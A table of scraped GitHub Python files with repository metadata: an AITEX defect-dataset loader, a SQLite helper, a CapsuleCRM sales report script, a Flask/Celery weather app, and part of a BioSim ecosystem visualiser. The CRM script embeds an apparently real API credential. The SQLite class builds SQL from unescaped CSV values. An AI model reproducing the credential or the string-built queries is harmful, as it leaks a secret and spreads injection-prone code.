seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
14265869744 | import os
from PIL import Image
from scipy.ndimage.filters import gaussian_filter
import cv2
import shutil # To copy the file
import sys
import numpy as np
import torch
from torchvision import transforms
from torch.utils.data import Dataset
import torch.nn.functional as F
import torchvision
from tqdm import tqdm
import urllib.request
import py7zr
import backbone as bb
aitex_folder = './datasets/AITEX/'
aitex_train_dir = aitex_folder + 'trainset/'
aitex_test_dir = aitex_folder + 'testset/'
aitex_mask_dir = aitex_folder + 'Mask_images/'
aitex_config_file = aitex_folder + 'config'
Defect_path = aitex_folder + 'Defect_images/'
NODefect_path = aitex_folder + 'NODefect_images/'
CUT_PATCHES = 1
AITEX_CLASS_NAMES = ['00', '01', '02', '03', '04', '05', '06']
PATCH_SIZE = 256 # patch size
STRIDE = PATCH_SIZE # stride of patch
ANOMALY_THRESHOLD = 0 # threshold to consider a patch as anomalous
class AitexDataSet(Dataset):
def __init__(self, class_name='03', resize=256, cropsize=224, is_train=True):
self.is_train = is_train
self.class_name = class_name
self.resize = resize
self.cropsize = cropsize
self.transform = transforms.Compose([transforms.Resize(resize, Image.ANTIALIAS),
transforms.CenterCrop(cropsize),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])])
self.transform_mask = transforms.Compose([transforms.Resize(resize, Image.NEAREST),
transforms.CenterCrop(cropsize),
transforms.ToTensor()])
self.main_dir = aitex_train_dir+self.class_name+'/' if self.is_train else aitex_test_dir+self.class_name+'/'
self.all_imgs = sorted(os.listdir(self.main_dir))
self.mask_dir = aitex_mask_dir
if not self.is_train:
self.all_mask = sorted(os.listdir(self.mask_dir))
def __len__(self):
return len(self.all_imgs)
def __getitem__(self, idx):
img_loc = os.path.join(self.main_dir, self.all_imgs[idx])
image = Image.open(img_loc).convert('RGB')
tensor_image = self.transform(image) # x in mvtec class
mask_name = self.all_imgs[idx].replace('.png', '_mask.png')
if os.path.isfile(self.mask_dir + '/' + mask_name):
mask_loc = os.path.join(self.mask_dir, mask_name)
mask = Image.open(mask_loc).convert('L')
tensor_mask = self.transform_mask(mask) # mask in mvtec class
else:
tensor_mask = torch.zeros([1, self.cropsize, self.cropsize])
if int(torch.sum(tensor_mask)) > ANOMALY_THRESHOLD: # y in mvtec class
defective = 1
else:
defective = 0
return tensor_image, defective, tensor_mask
def getName(self, idx, mask=False):
if mask:
return self.all_imgs[idx].replace('.png', '_mask.png')
else:
return self.all_imgs[idx]
def resizeAitex(dataset, original_width=4096, original_height=256):
img_ = dataset.squeeze(0).numpy()
img_ = cv2.normalize(img_, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)
img_ = img_.astype(np.uint8)
# Blur the image for better edge detection
img_blur = cv2.GaussianBlur(img_,(3,3), sigmaX=0, sigmaY=0)
# Canny Edge Detection
edges = cv2.Canny(image=img_blur, threshold1=100, threshold2=200)
vector = np.zeros(original_width)
for i in range(original_width):
for j in range(original_height):
vector[i] += edges[j][i]
derivative = np.gradient(vector)
max = np.argmax(derivative)
cut = (int(max/PATCH_SIZE) + CUT_PATCHES) * PATCH_SIZE
crop_img = transforms.functional.crop(dataset, top=0, left=cut, height=original_height, width=(original_width-cut))
new_widths = crop_img.shape[2]
new_heights = crop_img.shape[1]
return crop_img, new_widths, new_heights
# --------------- Functions for patches ---------------
def DivideInPatches(img, size, stride):
patches = img.unfold(1, size, stride).unfold(2, size, stride)
patches = patches.contiguous().view(patches.size(0), -1, size, size).permute(1,0,2,3)
return patches
def countAitexAnomalies():
masks = sorted(os.listdir(aitex_mask_dir))
number_of_defects = 0
defective = []
transform_mask = transforms.ToTensor()
for mask_name in masks:
mask_loc = os.path.join(aitex_mask_dir, mask_name)
mask = Image.open(mask_loc).convert('L')
tensor_mask = transform_mask(mask)
if int(torch.sum(tensor_mask)) > ANOMALY_THRESHOLD:
number_of_defects += 1
defective.append(True)
else:
defective.append(False)
return number_of_defects, defective
# --------------- Functions to create Aitex Dataset ---------------
def Reformat_Image(ImageFilePath, new_width, new_height, color, offset):
image = Image.open(ImageFilePath, 'r')
image_size = image.size
width = image_size[0]
height = image_size[1]
if color == 'white':
color = (255, 255, 255, 255)
elif color == 'black':
color = (0, 0, 0, 255)
if offset == 'center':
offset = (int(round(((new_width - width) / 2), 0)), int(round(((new_height - height) / 2), 0)))
elif offset == 'right':
offset = (0, 0)
elif offset == 'left':
offset = ((new_width - width), (new_height - height))
background = Image.new('RGBA', (new_width, new_height), color)
background.paste(image, offset)
background.save(ImageFilePath)
def DeleteFolder(path):
shutil.rmtree(path)
def MergeMasks(name):
mask1 = Image.open(name+'_mask1.png').convert('L')
mask2 = Image.open(name+'_mask2.png').convert('L')
mask1 = np.array(mask1)
mask2 = np.array(mask2)
mask = np.add(mask1, mask2)
mask = Image.fromarray(mask)
mask.save(name+'_mask.png',"png")
os.remove(name+'_mask1.png')
os.remove(name+'_mask2.png')
def BinarizeMasks(Mask_path):
thresh = 128
maxval = 255
all_imgs = sorted(os.listdir(Mask_path))
for i in all_imgs:
im_gray = np.array(Image.open(Mask_path+i).convert('L'))
im_bin = (im_gray > thresh) * maxval
Image.fromarray(np.uint8(im_bin)).save(Mask_path+i)
def RenameFolder(oldname, newname):
os.rename(oldname, newname)
def FlipImage(filename):
image = Image.open(filename)
image = np.fliplr(image)
Image.fromarray(np.uint8(image)).save(filename)
def CreateAitexDataset(resize, log_file):
try:
bb.myPrint("Preparing the AITEX dataset...", log_file)
NODefect_subdirectories = {
'2311694-2040n7u': '00',
'2608691-202020u': '01',
'2306894-210033u': '02',
'2311694-1930c7u': '03',
'2311517-195063u': '04',
'2306881-210020u': '05',
'2311980-185026u': '06'
}
os.makedirs(aitex_train_dir, exist_ok=True)
os.makedirs(aitex_test_dir, exist_ok=True)
for i in range(len(NODefect_subdirectories)):
RenameFolder(NODefect_path+list(NODefect_subdirectories.keys())[i], NODefect_path+list(NODefect_subdirectories.values())[i])
os.makedirs(aitex_train_dir+list(NODefect_subdirectories.values())[i], exist_ok=True)
os.makedirs(aitex_test_dir+list(NODefect_subdirectories.values())[i], exist_ok=True)
MergeMasks(aitex_mask_dir+'0044_019_04') # Merge and delete 0044_019_04.png masks
MergeMasks(aitex_mask_dir+'0097_030_03') # Merge and delete 0097_030_03.png masks
BinarizeMasks(aitex_mask_dir)
Reformat_Image(Defect_path + '0094_027_05.png', 4096, 256, 'white', 'right')
Reformat_Image(aitex_mask_dir + '0094_027_05_mask.png', 4096, 256, 'black', 'right')
os.remove(Defect_path + '0100_025_08.png')
FlipImage(Defect_path + '0094_027_05.png')
FlipImage(aitex_mask_dir + '0094_027_05_mask.png')
defect_images = os.listdir(Defect_path)
nodefect_images = []
for i in range(len(NODefect_subdirectories)):
for j in os.listdir(NODefect_path + list(NODefect_subdirectories.values())[i]):
nodefect_images.append(list(NODefect_subdirectories.keys())[i] + '/' + j)
for i in range(len(NODefect_subdirectories)):
new_folder = Defect_path+list(NODefect_subdirectories.values())[i] + '/'
os.makedirs(new_folder, exist_ok=True)
for img in defect_images:
if list(NODefect_subdirectories.values())[i]+'.png' in img:
shutil.move(Defect_path + img, new_folder + img)
Mask_path_temp = aitex_folder + '/Mask_images_temp/'
RenameFolder(aitex_mask_dir, Mask_path_temp)
os.makedirs(aitex_mask_dir, exist_ok=True)
for i in range(len(NODefect_subdirectories)):
last_image = os.listdir(NODefect_path+list(NODefect_subdirectories.values())[i] + '/')[-1]
new_folder = Defect_path+list(NODefect_subdirectories.values())[i] + '/' + last_image
old_folder = NODefect_path+list(NODefect_subdirectories.values())[i] + '/' + last_image
shutil.move(old_folder, new_folder)
transform = transforms.Compose([
transforms.ToTensor()
])
for i in range(len(NODefect_subdirectories)):
train_folder_temp = NODefect_path+list(NODefect_subdirectories.values())[i] + '/'
all_train_imgs = sorted(os.listdir(train_folder_temp))
for img in all_train_imgs:
img_loc = os.path.join(train_folder_temp, img)
image = Image.open(img_loc).convert('L')
tensor_image = transform(image)
if resize:
tensor_image, _, _ = resizeAitex(tensor_image)
train_patches = DivideInPatches(tensor_image, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(train_patches):
name = img.replace('.png', '_'+str(idx)+'.png')
name = os.path.join(aitex_train_dir+list(NODefect_subdirectories.values())[i] + '/', name)
torchvision.utils.save_image(patch, name)
test_folder_temp = Defect_path+list(NODefect_subdirectories.values())[i] + '/'
all_test_imgs = sorted(os.listdir(test_folder_temp))
for img in all_test_imgs:
img_loc = os.path.join(test_folder_temp, img)
image = Image.open(img_loc).convert('L')
tensor_image = transform(image)
if resize:
tensor_image, new_widths, _ = resizeAitex(tensor_image)
test_patches = DivideInPatches(tensor_image, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(test_patches):
name = img.replace('.png', '_'+str(idx)+'.png')
name = os.path.join(aitex_test_dir+list(NODefect_subdirectories.values())[i] + '/', name)
torchvision.utils.save_image(patch, name)
mask_name = img.replace('.png', '_mask.png')
if os.path.isfile(Mask_path_temp + mask_name):
mask_loc = os.path.join(Mask_path_temp, mask_name)
mask = Image.open(mask_loc).convert('L')
tensor_mask = transform(mask)
else:
tensor_mask = torch.zeros([1, 256, 4096])
if resize:
tensor_mask = transforms.functional.crop(tensor_mask, top=0, left=(4096-new_widths), height=256, width=new_widths)
test_masks = DivideInPatches(tensor_mask, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(test_masks):
name = mask_name.replace('_mask.png', '_'+str(idx)+'_mask.png')
name = os.path.join(aitex_mask_dir, name)
torchvision.utils.save_image(patch, name)
DeleteFolder(Defect_path)
DeleteFolder(NODefect_path)
DeleteFolder(Mask_path_temp)
f = open(aitex_config_file, "a")
f.write(str(resize))
f.close()
except Exception as e:
bb.myPrint(e, log_file)
bb.myPrint("Error in CreateAitexDataset function!", log_file)
DeleteFolder(aitex_folder)
sys.exit(-1)
def prepareAitex(resize, log_file):
if os.path.isdir(aitex_folder):
if (os.path.isdir(aitex_train_dir) and os.path.isdir(aitex_test_dir) and os.path.isdir(aitex_mask_dir)):
f = open(aitex_config_file, "r")
resize_ = f.readline()
f.close()
resize_ = True if resize_ == "True" else False
if resize == resize_:
return
else:
DeleteFolder(aitex_folder)
download(log_file)
CreateAitexDataset(resize, log_file)
else:
DeleteFolder(aitex_folder)
download(log_file)
CreateAitexDataset(resize, log_file)
else:
download(log_file)
CreateAitexDataset(resize, log_file)
# --------------- Functions to download Aitex Dataset ---------------
URL = 'https://www.aitex.es/wp-content/uploads/2019/07/'
ARCHIVES = [
'Defect_images.7z',
'NODefect_images.7z',
'Mask_images.7z'
]
def download(log_file):
bb.myPrint("Download AITEX dataset...", log_file)
os.makedirs(aitex_folder, exist_ok=True)
try:
for idx in range(len(ARCHIVES)):
if not os.path.isfile(aitex_folder+ARCHIVES[idx]):
download_url(URL+ARCHIVES[idx], aitex_folder+ARCHIVES[idx])
with py7zr.SevenZipFile(aitex_folder+ARCHIVES[idx], mode='r') as z:
z.extractall(path=aitex_folder)
os.remove(aitex_folder+ARCHIVES[idx])
return
except Exception as e:
bb.myPrint(str(e), log_file)
bb.myPrint("Can't download AITEX dataset. Retry later.", log_file)
sys.exit(-1)
class DownloadProgressBar(tqdm):
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def download_url(url, output_path):
with DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=url.split('/')[-1]) as t:
urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to) | LudovicoL/PaDiM | backbone/AITEX.py | AITEX.py | py | 14,796 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.Compose",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 43,
"usage_type": "name"
},
{
"ap... |
72692990823 | import sqlite3
class Db:
"""
A class used to represent database(Db)
"""
def __init__(self, database):
self.conn = sqlite3.connect(database, check_same_thread=False)
self.conn.row_factory = sqlite3.Row
self.cursor = self.conn.cursor()
def execute(self, query):
self.cursor.execute(query)
self.conn.commit()
def fetchall(self, query):
self.cursor = self.conn.cursor()
self.execute(query)
result = [dict(row) for row in self.cursor.fetchall()]
return result
def close(self):
self.conn.close()
def setup(self, data):
self.create_classes_table()
self.create_animals_table()
for d in data:
self.insert_data_from_csv(d[0], d[1])
def create_animals_table(self):
query = '''
create table animals
(id integer not null, animal_name text, hair integer, feathers integer, eggs integer, milk integer, airborne integer,
aquatic integer, predator integer, toothed integer, backbone integer, breathes integer, venomous integer,
fins integer, legs integer, tail integer, domestic integer, catsize integer, class_type integer,
primary key (id), foreign key (class_type) references classes(id))'''
self.execute(query)
def create_classes_table(self):
query = '''
create table classes
(id integer not null, number_of_animal_species_in_class integer, class_type text,
primary key (id))
'''
self.execute(query)
def insert_data_from_csv(self, csv_path, table):
with open(csv_path, 'r') as file:
next(file)
for line in file:
line = line.strip().split(',')
line[0] = f"'{line[0]}'" if not line[0].isdigit() else line[0]
line[1] = f"'{line[1]}'" if not line[1].isdigit() else line[1]
query = f'insert into {table} values (null, {", ".join(line)})'
self.execute(query)
# def add_foreign_key(self, table, foreign_key, ref_table, ref_column):
# query = f'''
# alter table {table}
# add foreign key ({foreign_key}) references {ref_table}({ref_column})'''
# print(query)
# self.execute(query)
| madeleinema-cee/think-of-an-animal-flask | db.py | db.py | py | 2,372 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlite3.connect",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sqlite3.Row",
"line_number": 11,
"usage_type": "attribute"
}
] |
29649845397 | import urllib3
import urllib.request
import base64
import json
import pandas as pd
from tabulate import tabulate
import codecs
import numpy as np
url = 'https://infeci.capsulecrm.com/api/opportunity'
headers = {}
# base64string = base64.urlsafe_b64encode('2d486e42771eee18125b8aef3afe216d:4c2TNRdi')
base64string = base64.encodestring(('2d486e42771eee18125b8aef3afe216d:4c2TNRdi').encode()).decode().replace('\n', '')
headers['Authorization'] = "Basic %s" % base64string
headers['Accept'] = "application/json"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
reader = codecs.getreader("utf-8")
data = json.load(reader(resp))
print (data)
# Creamos el CSV con las oportunidades
# atributos = ['name','probability','expectedCloseDate','createdOn','updatedOn','value','currency','partyId','milestoneId','milestone','owner','id','durationBasis']
# s = ""
# for atr in atributos:
# s = s + atr + ","
# s = s + "\n"
# for op in data['opportunities']['opportunity']:
# for atr in atributos:
# s = s + op[atr] + ","
# s = s + "\n"
#
# text_file = open("oportunidades.csv", "w")
# text_file.write(s)
# text_file.close()
data = pd.read_csv('oportunidades.csv')
print (tabulate(data, headers='keys', tablefmt='psql'))
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\tESTADO GLOBAL DE LAS OPORTUNIDADES")
data = pd.read_csv('oportunidades.csv')
df = data
df = df.drop(df.columns[[0, 1, 2, 3, 4, 6, 7, 8, 10, 11, 12]], axis=1)
df['benef'] = df['value'] * df['margen'] / 100
pt = df.groupby(['milestone']).sum()
pt['margen'] = 100 * pt ['benef'] / pt['value']
print (tabulate(pt, headers='keys', tablefmt='psql'))
print ("\tValor Total: %s" % data['value'].sum())
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\n\n")
print ("\tPROXIMAS OFERTAS A PRESENTAR")
data = pd.read_csv('oportunidades.csv')
df = data
df['benef'] = df['value'] * df['margen'] / 100
df = (df[df['milestone']=='New'])
df = df.sort_values('expectedCloseDate')
df = df.drop(df.columns[[1, 3, 4, 6, 7, 8, 10, 11, 12,13,14]], axis=1)
print (tabulate(df, headers='keys', tablefmt='psql'))
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\n\n")
print ("\tANALIZANDO...")
data = pd.read_csv('oportunidades.csv')
df = data
df['benef'] = df['value'] * df['margen'] / 100
df = (df[df['milestone']=='New'])
df = df.sort_values('expectedCloseDate')
print (df)
df = df.drop(df.columns[[1, 3, 4, 6, 7, 8, 10, 11, 12,13,14]], axis=1)
print (tabulate(df, headers='keys', tablefmt='psql'))
# {u'name': u'Definici\xf3n de Tarjeta de Transporte', u'probability': u'10', u'expectedCloseDate': u'2016-09-15T00:00:00Z',
# u'createdOn': u'2016-08-17T09:48:26Z', u'updatedOn': u'2016-08-17T11:29:53Z', u'value': u'95000.00', u'currency': u'EUR',
# u'partyId': u'115869164', u'milestoneId': u'405855', u'milestone': u'New', u'owner': u'rubenglezant', u'id': u'4609271',
# u'durationBasis': u'FIXED'}
# response = urllib2.urlopen('https://api.instagram.com/v1/tags/pizza/media/XXXXXX')
# curl -u 2d486e42771eee18125b8aef3afe216d:4c2TNRdi https://infeci.capsulecrm.com/api/party | rubenglezant/playBetterBets | Python-Bolsa/reportCRM/buildReport.py | buildReport.py | py | 3,230 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "base64.encodestring",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "urllib.request.request.Request",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 17,
"usage_type": "attribute"
},
{
"ap... |
34715801253 | from __future__ import absolute_import
from os import environ
import json
from flask import Flask, jsonify, request
import settings
from celery import Celery
import urllib2
app = Flask(__name__)
app.config.from_object(settings)
'''
==========================================
============= CELERY Section =============
==========================================
'''
def make_celery(app):
celery = Celery(app.import_name, backend='amqp', broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
return celery
celery = make_celery(app)
@celery.task(name='tasks.currentHomeTemp')
def currentHomeTemp():
f = urllib2.urlopen('http://api.wunderground.com/api/'
+ app.config['WUNDERGROUND_KEY']
+ '/geolookup/conditions/q/NY/Whitesboro.json')
json_string = f.read()
parsed_json = json.loads(json_string)
location = parsed_json['location']['city']
temp_f = parsed_json['current_observation']['temp_f']
f.close()
return "Current temperature in %s is: %s" % (location, temp_f)
@celery.task(name='tasks.currentZipcodeTemp')
def currentZipcodeTemp(zipcode):
f = urllib2.urlopen('http://api.wunderground.com/api/'
+ app.config['WUNDERGROUND_KEY']
+ '/geolookup/conditions/q/' + zipcode + '.json')
json_string = f.read()
parsed_json = json.loads(json_string)
temp_f = parsed_json['current_observation']['temp_f']
f.close()
return "Current temperature at zipcode %s is: %s" % (zipcode, temp_f)
@celery.task(name="tasks.add")
def add(x, y):
return x + y
'''
==========================================
============= FLASK Section ==============
==========================================
'''
@app.route('/')
@app.route('/myassistant')
@app.route('/myassistant/index')
@app.route('/myassistant/index.html')
def index():
return 'Hello World!!'
@app.route("/myassistant/test")
def hello_world(x=16, y=16):
x = int(request.args.get("x", x))
y = int(request.args.get("y", y))
res = add.apply_async((x, y))
return generateTaskIdJson(res)
@app.route("/myassistant/result/<task_id>")
def show_result(task_id):
retval = add.AsyncResult(task_id).get(timeout=1.0)
return repr(retval)
@app.route('/myassistant/weather/home/temp/current')
def homeWeather():
res = currentHomeTemp.apply_async()
return generateTaskIdJson(res)
@app.route('/myassistant/weather/<zipcode>/temp/current')
def currentTempAtZip(zipcode):
res = currentZipcodeTemp.delay(zipcode)
return generateTaskIdJson(res)
'''
==========================================
=========== UTILITY Section ==============
==========================================
'''
def generateTaskIdJson(taskResult):
context = {"id": taskResult.task_id,
"url": 'http://' + app.config['CALLBACK_IP']
+ ':'
+ str(app.config['CALLBACK_PORT'])
+ '/myassistant/result/'
+ taskResult.task_id}
return jsonify(context)
'''
==========================================
============== MAIN Section ==============
==========================================
'''
if __name__ == "__main__":
port = int(environ.get("PORT", app.config['LISTEN_PORT']))
app.run(host=app.config['LISTEN_ADDRESS'], port=port, debug=True) | elihusmails/myassistant | src/app/tasks.py | tasks.py | py | 3,707 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "celery.Celery",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "celery.conf.update",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "celery.conf",
"line_n... |
29335693587 | from keras.models import load_model
from sklearn.metrics import confusion_matrix
import itertools
import numpy as np
import matplotlib.pyplot as plt
import sys
import csv
def load_data(train_data_path):
X_train = []
Y_train = []
text = open(train_data_path, 'r', encoding='big5')
row = csv.reader(text , delimiter=",")
for i,r in enumerate(row):
if i == 0:
continue
Y_train.append(int(r[0]))
X_train.append(r[1].split())
return ( np.reshape(np.array(X_train,dtype='int'),(len(X_train),48,48,1)), np.array(Y_train,dtype='int') )
def split_valid_set(X_all, Y_all, percentage):
all_data_size = len(X_all)
valid_data_size = int(all_data_size * percentage)
X_train, Y_train = X_all[0:valid_data_size], Y_all[0:valid_data_size]
X_valid, Y_valid = X_all[valid_data_size:], Y_all[valid_data_size:]
return X_valid, Y_valid
def plotconfusionmatrix(cm, classes,
title='Confusion matrix',
cmap=plt.cm.jet):
"""
This function prints and plots the confusion matrix.
"""
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, '{:.2f}'.format(cm[i, j]), horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
def main():
model_path = 'check_point/'+sys.argv[1]
train_data_path = 'data/train.csv'
dev_feats, te_labels = load_data(train_data_path)
dev_feats, te_labels = split_valid_set( dev_feats, te_labels, 0.01 )
print("HHHHH")
emotion_classifier = load_model(model_path)
np.set_printoptions(precision=2)
predictions = emotion_classifier.predict(dev_feats)
predictions = predictions.argmax(axis=-1)
print (predictions)
print (te_labels)
conf_mat = confusion_matrix(te_labels,predictions)
plt.figure()
plot_confusion_matrix(conf_mat, classes=["Angry","Disgust","Fear","Happy","Sad","Surprise","Neutral"])
plt.show()
if __name__=='__main__':
main()
| b01901143/ML2017FALL | hw3/confusion.py | confusion.py | py | 2,433 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "csv.reader",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.cm",
"line... |
74330584745 | # -*- coding: utf-8 -*-
__author__ = "Amir Arfan, Sebastian Becker"
__email__ = "amar@nmbu.no, sebabeck@nmbu.no"
"""
Simulation of the Island with visualization
"""
from .map import Map
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import subprocess
import random
import os
import textwrap
_FFMPEG_BINARY = "ffmpeg"
_CONVERT_BINARY = "magick"
_DEFAULT_GRAPHICS_DIR = os.path.join("..", "data")
_DEFAULT_GRAPHICS_NAME = "dv"
_DEFAULT_MOVIE_FORMAT = "mp4" # alternatives: mp4, gif
class BioSim:
"""
Simulation of biosim
"""
rgb_value = {
"O": (0.0, 0.0, 1.0),
"M": (0.5, 0.5, 0.5),
"J": (0.0, 0.6, 0.0),
"S": (0.5, 1.0, 0.5),
"D": (1.0, 1.0, 0.5),
}
def __init__(
self,
island_map,
ini_pop,
seed,
ymax_animals=None,
cmax_animals=None,
img_base=None,
img_fmt="png",
):
"""
:param island_map: Multi-line string specifying island geography
:param ini_pop: List of dictionaries specifying initial population
:param seed: Integer used as random number seed
:param ymax_animals: Number specifying y-axis limit for graph showing animal numbers
:param cmax_animals: Dict specifying color-code limits for animal densities
:param img_base: String with beginning of file name for figures, including path
:param img_fmt: String with file type for figures, e.g. 'png'
If ymax_animals is None, the y-axis limit should be adjusted automatically.
If cmax_animals is None, sensible, fixed default values should be used.
cmax_animals is a dict mapping species names to numbers, e.g.,
{'Herbivore': 50, 'Carnivore': 20}
If img_base is None, no figures are written to file.
Filenames are formed as
'{}_{:05d}.{}'.format(img_base, img_no, img_fmt)
where img_no are consecutive image numbers starting from 0.
img_base should contain a path and beginning of a file name.
"""
self._map = Map(island_map)
self.map_rgb = [
[self.rgb_value[column] for column in row]
for row in island_map.splitlines()
]
self._map.add_animals(ini_pop)
np.random.seed(seed)
random.seed(seed)
self._year = 0
self._final_year = None
self._num_animals = 0
self._num_animals_per_species = {}
self._animal_distribution = None
self.img_fmt = img_fmt
self.img_count = 0
self.img_base = img_base
self._island_map = None
self._fig = None
self._map_ax = None
self._mean_ax = None
self._herb_line = None
self._carn_line = None
self.herb_heat = None
self.carn_heat = None
self.herb_img_axis = None
self.carn_img_axis = None
self.year_counter_active = False
if ymax_animals is None:
self.ymax_animals = 20000
else:
self.ymax_animals = ymax_animals
if cmax_animals is not None:
self.cmax_animals = cmax_animals
else:
self.cmax_animals = {"Herbivore": 50, "Carnivore": 20}
def set_animal_parameters(self, species, params):
"""
Set parameters for animal species.
:param species: String, name of animal species
:param params: Dict with valid parameter specification for species
"""
self._map.update_animal_params_all_cells(species, params)
def set_landscape_parameters(self, landscape, params):
"""
Set parameters for landscape type.
:param landscape: String, code letter for landscape
:param params: Dict with valid parameter specification for landscape
"""
self._map.update_param_all_cells(landscape, params)
def simulate(self, num_years, vis_years=1, img_years=None):
"""
Run simulation while visualizing the result.
:param num_years: number of years to simulate
:param vis_years: years between visualization updates
:param img_years: years between visualizations saved to files (default: vis_years)
Image files will be numbered consecutively.
"""
if img_years is None:
img_years = vis_years
self._final_year = self.year + num_years
self._setup_graphics()
while self._year < self._final_year:
if self._year % vis_years == 0:
self._update_graphics()
if self._year % img_years == 0:
self._save_graphics()
self._map.cycle()
self._year += 1
def _setup_graphics(self):
"""
Sets up plots and axes for the Simulation to be visualized
"""
if self._fig is None:
self._fig = plt.figure(figsize=(10, 8))
if self._island_map is None:
self._create_map()
if self._mean_ax is None:
self._mean_ax = self._fig.add_subplot(2, 2, 2)
self._mean_ax.set_title("Herbivore and Carnivore Population")
self._mean_ax.set_ylim(0, self.ymax_animals)
self._mean_ax.set_xlim(0, self._final_year + 1)
self._create_herb_line()
self._create_carn_line()
self.year_format = "Year: {:5d}"
if not self.year_counter_active:
self.txt = self._fig.text(
0.09,
0.97,
self.year_format.format(0),
ha="center",
va="center",
bbox=dict(boxstyle="round", ec=(0, 0, 0), fc="none",),
)
self.year_counter_active = True
if self.herb_heat is None:
self.herb_heat = self._fig.add_subplot(2, 2, 1)
self.herb_heat.set_title("Herbivore Heat Map")
self.herb_img_axis = None
if self.carn_heat is None:
self.carn_heat = self._fig.add_subplot(2, 2, 3)
self.carn_heat.set_title("Carnivore Heat Map")
self.carn_img_axis = None
self._fig.tight_layout()
def _update_graphics(self):
"""
Updates the plots with new data
"""
pop_df = self.animal_distribution
rows, cols = np.shape(self._map.map)
herb_count = pop_df.Herbivore
herb_array = np.array(herb_count).reshape(rows, cols)
carn_count = pop_df.Carnivore
carn_array = np.array(carn_count).reshape(rows, cols)
self._update_specie_lines()
self._update_herb_heatmap(herb_array)
self._update_carn_heatmap(carn_array)
self.txt.set_text(self.year_format.format(self.year))
plt.pause(1e-6)
def _save_graphics(self):
"""
Saves the plots as a specified file type.
"""
if self.img_base is None:
return
print(
"Saving to",
"{base}_{num:05d}.{type}".format(
base=self.img_base, num=self.img_count, type=self.img_fmt
),
)
plt.savefig(
"{base}_{num:05d}.{type}".format(
base=self.img_base, num=self.img_count, type=self.img_fmt
)
)
self.img_count += 1
def _create_map(self):
"""
Creates map plot out of RGB colors and map string.
"""
self._island_map = self._fig.add_subplot(2, 2, 4)
self._island_map.set_title("Island Map")
self._island_map.imshow(self.map_rgb)
labels = ["Ocean", "Mountain", "Jungle", "Savannah", "Desert"]
patches = [
mpatches.Patch(color=self.rgb_value[i], label=labels[n])
for n, i in enumerate(self.rgb_value.keys())
]
self._island_map.legend(handles=patches, prop={"size": 5}, loc=4)
self._island_map.set_xticks(range(len(self.map_rgb[0])))
self._island_map.set_xticklabels(
labels=(range(1, 1 + len(self.map_rgb[0]))),
fontdict={"fontsize": 6},
)
self._island_map.set_yticks(range(len(self.map_rgb)))
self._island_map.set_yticklabels(
labels=range(1, 1 + len(self.map_rgb)), fontdict={"fontsize": 6}
)
def _create_herb_line(self):
"""
Creates population graph for Herbivores
"""
if self._herb_line is None:
herb_plot = self._mean_ax.plot(
np.arange(0, self._final_year),
np.full(self._final_year, np.nan),
)
self._herb_line = herb_plot[0]
else:
xdata, ydata = self._herb_line.get_data()
xnew = np.arange(xdata[-1] + 1, self._final_year)
if len(xnew) > 0:
ynew = np.full(xnew.shape, np.nan)
self._herb_line.set_data(
np.hstack((xdata, xnew)), np.hstack((ydata, ynew))
)
def _create_carn_line(self):
"""
Creates population graph for Carnivores
"""
if self._carn_line is None:
carn_plot = self._mean_ax.plot(
np.arange(0, self._final_year),
np.full(self._final_year, np.nan),
)
self._carn_line = carn_plot[0]
else:
xdata, ydata = self._carn_line.get_data()
xnew = np.arange(xdata[-1] + 1, self._final_year)
if len(xnew) > 0:
ynew = np.full(xnew.shape, np.nan)
self._carn_line.set_data(
np.hstack((xdata, xnew)), np.hstack((ydata, ynew))
)
def _update_herb_heatmap(self, herb_heat):
"""
Updates the heatmap for Herbivores
"""
